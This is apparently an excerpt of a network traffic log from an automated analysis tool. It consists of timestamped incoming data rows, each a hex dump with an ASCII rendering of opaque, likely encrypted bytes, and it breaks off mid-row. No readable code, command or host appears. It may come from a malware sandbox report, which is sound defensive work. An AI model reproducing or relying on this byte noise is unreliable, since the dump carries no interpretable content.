2022-05-30 12:45:59 UTC	899	IN	Data Raw: bc 55 95 bd 93 d8 a7 06 ef b4 c3 35 ae 5d d7 98 fc b6 aa d8 bb aa 46 ff 81 9e 0a 62 d3 90 db 5d f1 f0 04 0b cc 6f a3 e1 1d 20 ca d8 17 fe 03 6d ab 70 67 e0 f2 e9 9b 36 ae d4 81 9b 0a 31 67 72 ef fc 54 1f 1f 10 8e 29 3d 25 f9 31 10 d0 f0 4b 0e a7 bd 50 15 cb 01 06 45 93 07 d9 39 46 a9 46 c3 91 42 04 47 da 52 09 8d c3 ff 5f 03 b0 42 74 2a 9d 12 a5 ce f8 19 0a 97 5a 15 8e c1 f0 ee 6b 18 ff b0 69 a1 08 97 98 64 d6 4e 71 d9 2d 1d 0e 63 93 ef 6a fc d4 14 ee dd d2 f9 b5 1c ba eb ff 0e e3 ac 95 ea 89 30 e5 f3 7a 23 c9 f1 e5 8b 47 8c c8 39 5e c8 f6 63 6a ee 50 b4 48 33 27 17 8f ca 41 78 3f d5 84 7f e4 85 ed 8a e6 14 62 54 a9 da 4a cd 71 62 61 4e 7f 2f 17 53 37 12 99 33 44 1a 8a 0b fe bf 63 85 61 39 84 b7 52 5f 88 7a fe 10 ab 8b 70 cb 75 2f 2a d2 eb fe 7d af 94 ca Data Ascii: U5]Fb]o mpg61grT)=%1KPE9FFBGR_BtZkidNq-cj0z#G9^cjPH3'Ax?bTJqbaN/S73Dca9R_zpu/}
2022-05-30 12:45:59 UTC	900	IN	Data Raw: 1d 06 6a c6 69 36 97 59 5a e2 6d af 39 21 56 e3 0c f7 92 fc 14 b6 a0 5d f9 6a 0e bc ed b2 2b 80 6a 14 3c f2 99 12 3d bc 3f 96 ad 99 ce a7 89 68 ac ca fa 6d 6a af bb 29 04 d4 83 4d c4 18 b2 a2 60 34 6e 70 b8 2c f5 db fe 33 81 6b 94 4b 2d 63 5b 95 c9 ce c1 79 1f 35 c3 4c 23 7f 8f 8a 0a 0e 0c 2a 50 46 88 bf 05 23 6d 58 27 40 14 85 ad d6 66 06 09 31 7f ce b7 55 2e c6 d5 6e 01 0b 91 49 fb 24 1c 76 f6 f8 fa 99 5c 57 b8 98 3d 50 31 35 b1 94 cf 09 a9 79 e0 c4 c4 07 8d dd a5 46 b5 0d dc 16 78 a0 2b 1e bb 90 93 93 9f 95 70 94 1c e3 b7 b6 d1 34 00 5c a3 85 08 44 67 b9 fa 59 83 db 08 99 68 33 3f 35 2e c9 81 5d a9 28 18 99 fc b6 40 cd e1 d9 83 a3 55 6f 0a 20 d8 c4 f8 8c 17 38 a1 f4 73 4f b1 d1 05 4a 4b 8f c5 64 ba cd f2 a3 c1 0e e4 b1 d9 26 a6 56 f8 92 ea 95 f9 4c c8 Data Ascii: ji6YZm9!V]j+j<=?hmj)M`4np,3kK-c[y5L#*PF#mX'@f1U.nI$v\W=P15yFx+p4\DgYh3?5.](@Uo 8sOJKd&VL
2022-05-30 12:45:59 UTC	902	IN	Data Raw: b7 ba 4a c7 b9 ab e3 3d e8 55 8d aa 64 75 a4 63 84 83 3c b5 ff 87 c7 18 bb 17 c8 9c 6a 23 8f 33 b8 fb ea 59 f6 f1 e8 ec c4 3a 28 4f ab 25 f0 0c b7 c0 52 e1 c2 d3 ee 2b 96 8e 92 b6 f6 01 2d 78 a3 49 41 61 ad 65 4b cf 6e db 4a 1c 5e 79 b0 36 0b 25 58 4c f6 5a 87 56 d6 dd 98 c0 25 53 3c 76 b5 69 55 35 e4 a3 7a c0 ec 05 e7 48 4f 6d 20 f7 01 82 be 9a f4 b9 95 f4 73 14 b1 1f 0b 64 28 8d 44 5e 03 10 08 b1 62 f1 57 30 6a b0 a7 9b c1 35 b5 6c 78 90 86 da 64 75 1c 44 c4 4d 54 f1 83 d0 1e f0 52 34 9d e0 4d fd c7 37 c9 47 ea e9 28 24 1f 71 45 c1 6a 91 e3 c0 9c 58 6f 90 8d 04 5a ee 75 ba 13 8d 3a 69 af 2b d7 73 bb fc 1a b7 fc b4 97 04 65 be 15 90 5f 44 60 7d f0 40 c8 6f 9b 21 b0 37 47 e5 6d 8c 00 cb ca 9d 4e 05 6a c4 69 7f f9 16 2e ce 7c c3 55 f7 33 ec 19 c9 98 da 11 Data Ascii: J=Uduc<j#3Y:(O%R+-xIAaeKnJ^y6%XLZV%S<viU5zHOm sd(D^bW0j5lxduDMTR4M7G($qEjXoZu:i+se_D`}@o!7GmNji.\|U3
2022-05-30 12:45:59 UTC	903	IN	Data Raw: 5b 1f 14 83 6f 1d 3f c0 33 20 c8 ef 5a 22 a4 97 50 37 aa 6d dd 36 87 75 bc c0 30 8b 77 d8 aa 47 01 47 ec 4d 54 da d9 ff 58 1c b1 47 7a 2a f4 7d b7 cd b7 9a 6e be 72 14 bc cd e4 ca 3f 61 17 d6 39 84 66 b2 91 62 d6 15 05 fe 24 00 38 41 f5 89 33 8d eb 7b 8f 23 9f d7 b2 1a 98 f6 e8 3c 8c c0 66 aa 89 42 8a 3c 1e 17 df b6 94 a2 40 8d d4 21 6c 85 dc 05 48 8b 24 5a 39 0e 21 37 8f ed 5c 73 3f c9 e8 1a 5c 81 bb d0 95 26 7e 5b a1 cc 51 d0 76 73 44 53 13 4a 21 2f 25 77 ed 75 26 20 8d 18 ed a1 65 93 22 56 0c d6 54 57 9d 6b 8b 46 c5 8a 67 da 5f 6a 8e 95 ed 97 0f 5d e0 ec 43 d3 11 88 f7 ac a1 66 8d d6 9e 42 c8 f9 4b 7a 61 cf 65 72 ea a7 33 24 d4 26 99 a9 8e 64 8b 9f 85 67 15 97 a0 11 0b 28 83 49 0c 17 56 a4 d3 87 56 f1 a1 b5 cf 2b ea 45 af de 01 43 a5 05 f7 b5 31 95 fd Data Ascii: [o?3 Z"P7m6u0wGGMTXGz*}nr?a9fb$8A3{#<fB<@!lH$Z9!7\s?\&~[QvsDSJ!/%wu& e"VTWkFg_j]CfBKzaer3$&dg(IVV+EC1
2022-05-30 12:45:59 UTC	904	IN	Data Raw: 37 dd 58 a2 b2 90 57 ee 1c c0 2e 55 17 e8 0f 58 56 b5 11 48 35 c3 e8 22 38 ea fe 5d 67 e2 4e 35 3b d6 d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 01 73 6e f6 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 53 16 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 c1 fa 8c 83 9e 65 e9 1c 4a 7c 59 47 b9 e3 32 c8 5a 7c 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f af c4 f8 47 15 6b c4 80 24 26 df b5 6a 3d 1f ea bd 10 ed cd f2 b6 c3 43 81 c2 aa 47 c1 33 ba fd 92 c2 f9 ac c9 c3 28 98 f2 df 0a b1 d3 d4 be 31 94 84 61 4d a5 03 c6 a0 1d 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 13 07 8b 85 14 1e 1e 15 8d 6f 59 50 b4 5f 72 b0 9d 2f 46 c8 da 3e 55 ca 00 b9 Data Ascii: 7XW.UXVH5"8]gN5;wF<w2{Om1]Ksn;Qr3 ?TAyCFSFIpaci27"eJ\|YG2Z\|iB<nOGk$&j=CG3(1aMUxz+ruo\|oYP_r/F>U
2022-05-30 12:45:59 UTC	905	IN	Data Raw: 61 ad 36 03 8a 22 97 79 2e 70 1d dc 5a 0b 6e 59 1f 82 28 d3 39 9f b3 ec 81 25 16 3c 26 d4 1d 3d 73 8d cf 1f 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 da 51 89 2c 4d 35 19 6f 49 e2 6f b2 fe cb 9d 28 1e 44 fe 07 4e ee 67 8b 04 a2 54 19 dd 4e a7 12 88 db 11 96 d8 96 b5 3e 2c 56 5e ab 73 7c 4a 64 cf 42 e9 5e be 16 95 0a 56 da 0c e8 65 b9 ca 38 4e 72 0b b2 0c 36 97 45 5a a1 0c c3 55 6f 33 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b e8 de 5d 4f b1 fa 1e b0 79 c6 c7 60 96 6f 37 dd 58 a2 b2 90 57 ee 1c c0 2e 55 17 17 f0 a7 a9 b5 11 48 35 Data Ascii: a6"y.pZnY(9%<&=sl<<: Qvx[DK\_2yTB^1+1t3B#VQ,M5oIo(DNgTN>,V^s\|JdB^Ve8Nr6EZUo3x]*`vSvqFPk]Oy`o7XW.UH5
2022-05-30 12:45:59 UTC	907	IN	Data Raw: f4 fd 17 a5 7d 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 bb e3 94 60 17 35 c5 8a 38 a2 05 07 02 3a 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 39 68 b3 04 36 fa 0e 8b 71 c7 cd 02 ae 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 52 e7 9a c1 c0 08 e9 9a f7 2c ad b8 4b fd 60 88 00 86 a9 c8 5e 49 b5 48 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 7e 78 38 c9 b6 e9 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 d0 93 eb 82 60 de 74 bd e8 0f 66 f7 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3b c2 43 89 45 d4 af 3c a0 c2 f4 ee 6e ee fa e0 d7 95 75 64 1b cc 27 00 61 ad 36 03 8a 22 97 79 2e 70 1d dc 5a 0b 6e 59 1f 82 28 d3 39 Data Ascii: }CHez4V{nOBP.Ma-$:\DV3L`58:/dWdw%iNa9h6q/&R,K`^IHeNF ~x8"E6"CT`tfrtG;CE<nud'a6"y.pZnY(9
2022-05-30 12:45:59 UTC	907	IN	Data Raw: b6 a0 73 bb 90 4e c2 70 c3 81 e7 5d 9d 7c 10 c9 b7 dc ac fd 17 f0 45 a0 88 bb 71 1c 67 9f e6 d3 67 d8 22 17 a5 bd 7e 93 48 1b 3a 30 93 39 c6 fc 98 d5 1e ba 9e f1 77 6a db 66 84 4b e3 b0 d2 ed d9 44 5e 94 1f 03 60 c6 d7 6e f2 fa bb 7a d1 cc b3 04 67 8f 24 2c b0 58 44 54 15 ad 33 a9 50 a3 84 dc 2a 84 bb e9 94 60 17 57 c5 8a 38 b1 05 07 02 30 7f 2f 64 5a 64 77 ed 6f 25 69 fe 0b 8c cd 0c 85 61 39 68 87 04 36 fa 40 8b 71 c7 9d 02 ae 10 61 c3 d6 bd c0 0f db e1 e5 26 a7 52 ba 9a c1 c0 5c e9 9a f7 79 ad b8 4b a7 60 88 00 5d a9 c8 5e 43 b5 48 fd 01 e7 0a ee 30 85 bd 14 34 c5 65 4e 42 f4 20 7e 9c 38 c9 b6 e3 23 a2 d5 23 a6 45 8d 26 f9 de 01 d4 a4 43 85 d1 55 d0 93 e9 83 60 de 73 bc e8 0f 6e f6 72 b8 88 eb 0a 9e ca 84 80 9b 9a 47 3b c2 56 88 45 d4 b8 3d a0 c2 2c ee Data Ascii: sNp]\|Eqgg"~H:09wjfKD^`nzg$,XDT3P*`W80/dZdwo%ia9h6@qa&R\yK`]^CH04eNB ~8##E&CU`snrG;VE=,
2022-05-30 12:45:59 UTC	909	IN	Data Raw: d7 77 46 0c 3c 7f 32 28 e6 8d a5 41 4f 39 31 36 5d fb 06 0c b2 c0 01 73 6e de 3b 94 51 62 12 a1 91 b4 fd 33 20 b9 1e 1f 03 54 41 f2 f8 e6 7d cb 16 81 b6 a0 43 ec a9 c4 46 b5 ff dc 53 16 d5 46 49 d2 fe f7 fc e8 e6 70 61 1c a6 cf df a5 63 69 32 c7 ea 7f 37 22 c1 fa 8c 83 9e 65 e9 1c 4a 7c 59 47 b9 e3 32 c8 5a 7c 99 fc 69 42 9e 89 b6 f4 f4 3c 01 6e 4f af c4 f8 47 15 6b c4 80 24 26 df b5 6a 3d 1f ea bd 10 ed cd f2 b6 c3 43 b2 f1 99 74 f2 00 89 ce e6 93 a8 72 a5 8c 67 66 9e 90 45 4b b9 98 f2 cb fd c9 2c b2 f2 47 82 45 2e 66 f9 a8 4b bd 49 18 c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 3d 34 d0 a1 40 82 af d1 de af bd c0 ba 1f d5 47 a4 63 c6 43 b9 83 7d ed 7f 5c 8c 93 7c f0 64 c5 8c a3 a2 c1 40 f0 19 e4 5e 9d 12 d9 cd b7 69 6f f9 17 Data Ascii: wF<2(AO916]sn;Qb3 TA}CFSFIpaci27"eJ\|YG2Z\|iB<nOGk$&j=CtrgfEK,GE.fKIruo\|n=4@GcC}\\|d@^io
2022-05-30 12:45:59 UTC	910	IN	Data Raw: cf 1f 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 6f f7 f9 ef 2d a8 20 f2 3d 38 3b 0f 44 dc 1d ab 70 b8 c3 f3 b7 26 b0 e5 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 bb 33 ea 48 28 53 7e 07 20 88 04 de 93 a5 f2 58 6f 36 8d 73 3b 98 10 f3 7d d8 54 19 dd 4e a7 12 c9 99 52 d2 f6 bb 99 89 23 5a 53 18 78 74 43 cb 0c 69 c3 f5 34 f0 72 ad e4 39 b5 17 8e 00 73 c7 a5 cb b2 4d 60 56 f7 ba 1c e7 4a 3c 13 29 75 64 3e f9 bb 6c 7f f3 d8 5d f9 2a 0f fb 88 c6 60 e5 13 76 53 93 eb 76 71 dd 46 f9 d8 ed 80 c6 e4 0d ed ca fa 50 6b e8 de 5d 4f b1 fa 1e b0 79 c6 c7 60 96 6f 37 4c c9 33 4d 01 c6 7f e3 51 bf c4 e8 af 6f 38 56 48 f9 a0 ca 3e 00 ca c7 17 16 b5 98 9f a6 d7 ce a7 bc 1c b9 9d ad e6 cd ea 77 59 5a 79 23 01 ce 7f 5d b5 06 4b b2 Data Ascii: l<<: Qo- =8;Dp&^1+1t3B#V3H(S~ Xo6s;}TNR#ZSxtCi4r9sM`VJ<)ud>l]*`vSvqFPk]Oy`o7L3MQo8VH>wYZy#]K
2022-05-30 12:45:59 UTC	911	IN	Data Raw: 6f 1f 59 ba 3d d7 cd 2e 01 dd 2b 6f 37 59 e5 2d 74 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 44 7a 94 9f 3d 1f ef 75 38 a2 05 f8 02 3a 7f d0 65 75 65 88 fa fd 0a 96 f2 17 95 32 04 b8 70 c6 61 e5 17 c9 ef 75 a1 8e c7 c3 02 51 05 59 ea 29 af e2 29 24 e8 fe 34 58 5d 8b 84 3e ce 68 f2 65 f7 2e ad 47 4b fd 60 77 60 66 c9 37 b4 cd b5 b7 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 81 e1 38 36 9d c1 08 5d d5 cf a6 ba 8d 20 f8 21 01 26 a4 bc 85 cd 54 2f 93 f7 82 9f de 55 bd 17 0f 77 f7 8d b8 d8 eb f5 9e 8a 84 7f 9b 5c 47 c4 c2 62 89 ba d7 93 3a 5f c4 ce e7 91 ee fa e0 28 95 62 64 e4 cc 27 00 9e f4 61 5a 75 c8 13 79 d1 70 1d dc 5a 0b 6e 59 1f 82 28 d3 39 9f b3 ec 81 da 8f 3c d9 fc 35 1b 8c 83 bf 3d 7a 85 16 b5 c3 3c 22 20 4c 1a 4c e7 11 81 5d c0 67 35 e0 Data Ascii: oY=.+o7Y-t$:\DV3LDz=u8:eue2pauQY))$4X]>he.GK`w`f7eNF 86] !&T/Uw\Gb:_(bd'aZuypZnY(9<5=z<" LL]g5
2022-05-30 12:45:59 UTC	913	IN	Data Raw: f7 fc e8 e6 70 4a 37 8d 18 f5 8f 49 83 18 ed c0 95 1e 0b e8 10 ce bf a2 8b 52 93 c5 83 95 d1 2f 1c f8 5d cf 83 52 69 fc bd 55 1c 23 0b 3f a9 94 91 9e 37 5c 07 e1 93 ed 3b ab 0e 0c 32 ae 71 26 f5 f0 a7 0a 07 d7 e8 ac 29 53 91 d2 7d 47 c1 33 ba fd 92 c2 f9 ac c9 c3 28 98 f2 df 0a b1 d3 d4 be 31 94 84 61 4d a5 03 c6 a0 1d 55 ca 9b 78 8e 7a 2b c2 1c 02 b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 53 53 58 61 0e 38 31 4a 3e 13 d1 63 4e 27 a9 24 5f 34 ab fe 05 dc 49 8a 4f e4 8e 33 fe 1b 49 d1 80 95 01 dd d6 08 27 6e d2 c4 74 d5 ed e3 20 ed 79 44 3e 96 0f 99 77 9f 9a c4 e8 50 0b 78 07 4c 59 b3 07 0b c7 2d 9f 90 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c Data Ascii: pJ7IR/]RiU#?7\;2q&)S}G3(1aMUxz+ruo\|SSXa81J>cN'$_4IO3I'nt yD>wPxLY-CHez4V{nOBP.Ma-$:\
2022-05-30 12:45:59 UTC	914	IN	Data Raw: 4c 3b d6 5e 15 3c 5c 27 81 7f 58 f0 fb a2 ef d9 0d 23 14 4d 72 08 40 e3 ef 88 06 a3 ab 62 a6 35 58 69 b2 e2 ad a9 e6 ab 0d 0d 1e 67 ea 9c 45 49 fa 4f e5 6b 45 7f 9e 35 3d c7 9a 15 f3 05 e2 b9 35 38 4e 72 0b b2 0c 36 97 45 5a a1 0c c3 55 6f 33 9b 78 bf fd 93 7f f3 d8 5d f9 2a 0f fb 88 c6 60 1a 8a 76 ac d1 a9 34 8e dd 46 f9 27 ed 80 c6 1b 0d ed ca 05 50 6b e8 21 5d 4f b1 05 1e b0 79 39 c7 60 96 90 37 dd 58 5d b2 90 57 11 1c c0 2e aa 17 17 f0 58 a9 b5 11 b7 35 c3 e8 dd 38 ea fe a2 67 62 4e c0 31 dc d7 88 46 0c 3c 88 32 7b e6 37 a5 15 4f 92 31 7f 5d 4a 6b 26 df 6c ec f4 6e 09 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 b5 00 45 53 e9 ea 79 76 2d fe f7 fc 17 e6 70 61 e3 a6 cf df 5a 63 69 32 38 ea 7f 37 dd c1 fa Data Ascii: L;^<\'X#Mr@b5XigEIOkE5=58Nr6EZUo3x]*`v4F'Pk!]Oy9`7X]W.X58gbN1F<2{7O1]Jk&ln;Qr3 ?TAyCFESyv-paZci287
2022-05-30 12:45:59 UTC	915	IN	Data Raw: fb 24 8f 28 74 78 92 df fd a1 7c 31 3c d8 dd 8c f0 d4 8d b5 d9 a9 32 fc 65 c1 c0 08 16 9a f7 2c 52 d8 2b 9d 9f 65 87 06 56 c8 5e 49 b5 48 fd e5 e7 0a ee c8 85 bd 14 d0 c5 65 4e 46 f5 20 7e 78 38 c9 b6 e9 22 a2 d5 c7 a6 ba 14 36 07 f5 29 08 5b 43 8d d0 ab d0 85 eb 7d 60 c8 74 42 e8 0b 66 08 72 bc d7 14 0a 83 94 7b 80 87 74 b8 3b e3 43 76 45 c5 af c3 a0 cd f4 11 6e f0 fa 1f d7 bd 75 9b 1b ed 27 ff 62 91 30 fc 8c 18 9e 86 2e 70 1d 23 5c 31 67 a6 1f 82 28 2c 39 81 b3 13 81 25 16 c3 7f 83 44 c2 9e 0a cf e0 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 47 e0 54 f9 f4 8f 2a 3e 4c a4 38 e2 c8 92 ba ff 00 24 10 5d 24 6e 9d 7c 74 06 87 cc 59 66 91 dc b3 11 6a 44 10 5b 0f d7 40 11 20 df 8e 3a d5 6c bb 58 66 90 2f 1f Data Ascii: $(tx\|1<2e,R+eV^IHeNF ~x8"6)[C}`tBfr{t;CvEnu'b0.p#\1g(,9%Dl<<: Qvx[DK\_2GT*>L8$]$n\|tYfjD[@ :lXf/
2022-05-30 12:45:59 UTC	916	IN	Data Raw: 1f 1d cd f2 b9 33 43 81 cd 5a 47 c1 3c 4a fd 92 cd 09 ac c9 cc d8 98 f2 d0 f2 b1 d3 cb 41 ce 6b 7b 49 4d a5 03 f6 a0 1d 55 aa 9b 78 8e 7b 2b e2 1c 02 b7 f2 72 1b 50 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 cb 01 b8 45 d0 75 bc 58 32 cc 12 ac fe 2e 6c 22 b6 22 3a bf 90 91 3e 73 c3 2a 1b 5e 9d 12 d9 cd b7 69 6f f9 17 60 fa a4 88 af 6b 18 67 b3 39 d3 67 f4 fd 17 a5 7d 43 97 48 65 7a 34 93 ef 56 ff 98 7b 8f b9 9e 90 d7 6e db 99 86 4f e3 ac 03 e9 d9 42 8a 90 1f 50 ba c2 d7 cd 2e fe bb 4d 09 c8 b3 61 2d 8b 24 e4 3a 5c 44 56 eb ae 33 1d 4c a6 84 7f 0b 81 bb e3 94 60 17 35 c5 8a 38 a2 05 07 02 3a 7f 2f 64 57 64 77 ed 7f 25 69 fe 4e 8c cd 0c f7 61 39 68 b3 04 36 fa 0e 8b 71 c7 cd 02 ae 10 2f c3 d6 bd 97 0f db e1 ab 26 Data Ascii: 3CZG<JAk{IMUx{+rPo\|nXQ^s.G?TEuX2.l"":>s*^io`kg9g}CHez4V{nOBP.Ma-$:\DV3L`58:/dWdw%iNa9h6q/&
2022-05-30 12:45:59 UTC	918	IN	Data Raw: 8d f4 47 f9 c9 68 b1 ae 5e f2 31 a7 90 cc 73 90 40 06 4d a1 0c 20 b9 1d d5 f0 03 70 39 9f 10 e6 89 ac 64 1c 89 bf 63 f8 06 67 55 38 39 3b ed 0d 35 24 8e b5 17 00 83 91 4e 24 c0 6e 86 21 20 87 69 2c 74 9e bc a2 b2 90 57 ee 1c c0 2e 55 17 17 f0 a7 a9 b5 11 48 35 c3 e8 22 38 ea fe 5d 67 62 4e 3f 31 dc d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 01 73 6e f6 3b 94 51 72 12 a1 91 94 fd 33 20 b8 1e 3f 03 54 41 f2 f8 a6 79 cb 16 81 b6 a0 43 ec a9 c4 46 d1 9b b8 b6 70 b3 20 ba b6 9a 93 0f 8b 85 13 92 7e c4 ad 2c fb 3c 36 c1 ad 88 1d ce ed 6a 51 73 75 70 8b 16 ef a2 94 a6 a9 58 02 cd 36 a2 84 66 03 b2 99 61 79 08 4a 0b e9 9e f1 b0 6a 53 6f b8 f2 bd 12 7f d3 cb 32 4a 9e d5 f7 15 31 67 9a 32 b4 f1 84 b6 ca 89 e1 b4 8a 78 f1 0e d8 88 b3 5f 82 88 Data Ascii: Gh^1s@M p9dcgU89;5$N$n! i,tW.UH5"8]gbN?1wF<w2{Om1]Ksn;Qr3 ?TAyCFp ~,<6jQsupX6fayJjSo2J1g2x_
2022-05-30 12:45:59 UTC	919	IN	Data Raw: e9 22 a2 d5 c7 a6 45 8d 36 f8 de 01 22 a4 43 85 d0 54 d0 93 eb 82 60 de 74 bd e8 0f 66 f7 72 b8 d7 eb 0a 9e 94 84 80 9b 74 47 3b c2 43 da 14 85 7a 86 1d 7f 0b 36 b4 34 05 9b ab e9 8a 21 5d 8a d8 13 74 b8 c9 03 8a 22 97 0c 5b 05 04 dc 5a 0b 6e 59 1f 82 28 d3 39 9f b3 ec 81 25 16 3c 26 d4 1d 3d 73 8d cf 1f 85 94 6c 94 3c 3c 3a 20 b3 01 d2 df ee 9c ff fc 98 16 51 c9 76 78 10 5b cc 44 0d 4b 5c 5f f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 a9 23 ae b3 56 44 86 ea 6e d7 f4 7e cb df 2c 04 21 6c 06 f2 a7 90 95 8d 8c c4 3c 10 0c 82 7c 54 e6 22 ea a7 ed 36 3d 52 2d 62 74 f2 89 9a b8 15 18 c1 96 05 cb 61 b4 ba f5 14 e4 c2 ad f0 24 0c 17 9a 1d ca c7 b1 d6 0b 4d f3 92 97 ba a5 05 0c 3c aa cb 33 64 87 1b fd 6c 80 57 Data Ascii: "E6"CT`tfrtG;Cz64!]t"[ZnY(9%<&=sl<<: Qvx[DK\_2yTB^1+1t3B#VDn~,!l<\|T"6=R-bta$M<3dlW
2022-05-30 12:45:59 UTC	920	IN	Data Raw: 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db 3f 54 34 a4 b8 ba 34 cf 3c a7 32 cc 12 53 fe 2e 6c dd b6 22 3a 40 90 91 3e 8c c3 2a 1b a1 9d 12 d9 32 b7 69 6f 06 17 60 fa 5b 88 af 6b e7 67 b3 39 2c 67 f4 fd e8 a5 7d 43 68 48 65 7a cb 93 ef 56 00 98 7b 8f 46 9e 90 d7 91 db 99 86 b0 e3 ac 03 16 d9 42 8a 6f 1f 50 ba 3d d7 cd 2e 01 bb 4d 09 37 b3 61 2d 74 24 e4 3a a3 44 56 eb 51 33 1d 4c 59 84 7f 0b 7e bb e3 94 9f 17 35 c5 75 38 a2 05 f8 02 3a 7f d0 64 57 64 88 ed 7f 25 96 fe 4e 8c 32 0c f7 61 c6 69 b2 05 c9 05 b2 09 8e 38 68 02 51 10 2f c3 d6 bd 97 0f db e1 ab 26 a7 52 e7 9a c1 c0 08 e9 9a f7 2c ad b8 4b fd 60 88 00 06 a9 c8 a1 ec b5 b7 19 58 67 f5 ee c8 85 42 14 d0 c5 9a 4e 46 f5 df 7e 78 38 36 b6 e9 22 5d d5 c7 a6 ba 8d 36 f8 21 01 22 a4 bc 85 d0 54 2f 93 eb Data Ascii: nXQ^s.G?T44<2S.l":@>*2io`[kg9,g}ChHezV{FBoP=.M7a-t$:DVQ3LY~5u8:dWd%N2ai8hQ/&R,K`XgBNF~x86"]6!"T/
2022-05-30 12:45:59 UTC	921	IN	Data Raw: 22 58 a2 b2 6f 57 ee 1c 3f 2e 55 17 e8 f1 a6 a8 4a ee f7 b0 3c 17 87 38 15 fe 5d 67 62 4e 3f 31 dc d7 77 46 0c 3c 77 32 7b e6 c8 a5 15 4f 6d 31 7f 5d b5 06 4b b2 93 01 73 91 53 3b 6b b5 cf 90 5e 91 8e fd cc 32 d6 3b c0 19 df 74 0d fb ef 7f 34 05 f2 91 5f 4e b9 b2 3b 46 94 ff 23 51 5f d1 b9 7b 18 9a 08 cf 24 80 8f 68 43 b5 30 df bc 63 96 32 c5 ea 80 37 22 c1 05 8c 83 9e 9a e9 1c 4a 83 59 47 b9 1c 32 c8 5a 83 99 fc 69 bd 9e 89 b6 0b f4 3c 01 91 4f af c4 07 47 15 6b 3b 80 24 26 20 b5 6a 3d e0 ea bd 10 12 cd f2 b6 3c 43 81 c2 55 47 c1 33 45 fd 92 c2 06 ac c9 c3 d7 98 f2 df f5 b1 d3 d4 41 31 94 84 9e 4d a5 03 39 a1 1c 54 35 64 b8 08 85 d4 67 1c fd b7 f2 72 9b 75 dc b1 e0 ef 6f 7c 12 06 8a 84 15 1f 1f 14 8c 6e 58 51 b5 5e 73 b1 9c 2e 47 c9 db c0 f1 cb fe 5c f8 Data Ascii: "XoW?.UJ<8]gbN?1wF<w2{Om1]KsS;k^2;t4_N;F#Q_{$hC0c27"JYG2Zi<OGk;$& j=<CUG3EA1M9T5dgruo\|nXQ^s.G\
2022-05-30 12:45:59 UTC	923	IN	Data Raw: 52 37 2c 88 dd 97 50 2e 8f 1d f4 5a f4 6e 69 1f 7d 28 ff 39 60 b3 cc 81 da 16 2a 26 2b 1d 33 73 72 cf 15 85 6b 6c 9c 3c c3 3a 28 b3 fe d2 da ee 63 ff fd 98 e9 51 c9 76 87 ef 99 4b bb f2 ee 5c a0 f0 32 b8 79 54 06 dc a7 0c c1 42 d4 1a 1d d9 e8 9b 00 11 5e 31 a2 2b 31 83 83 74 1e 87 33 42 f8 56 86 ae 4c b2 06 b1 15 48 2f 53 81 07 36 88 fb de b2 a5 0d 58 70 36 72 73 21 98 ef f3 73 d8 ab 19 da 4e 58 12 d9 99 ad d2 be d0 0d 76 4b 1d ea e7 0e 32 fa 34 af 11 45 0a d8 41 3d 52 3d 80 f3 e8 49 b8 35 38 57 72 f4 b2 18 36 68 45 7e a0 f3 c3 78 6e cc 9b 48 be 02 92 4b f1 27 5d cc 28 f0 fb bc c7 9f e5 27 77 ac 93 d5 77 8e ce 30 d1 27 e1 d9 de 1b 0d f7 ca 05 50 67 e8 21 5d 58 b1 05 1e 96 78 39 c7 48 96 90 37 f4 59 5d b2 8f 57 11 1c cd 2e aa 17 15 f0 58 56 77 96 b7 ca 66 Data 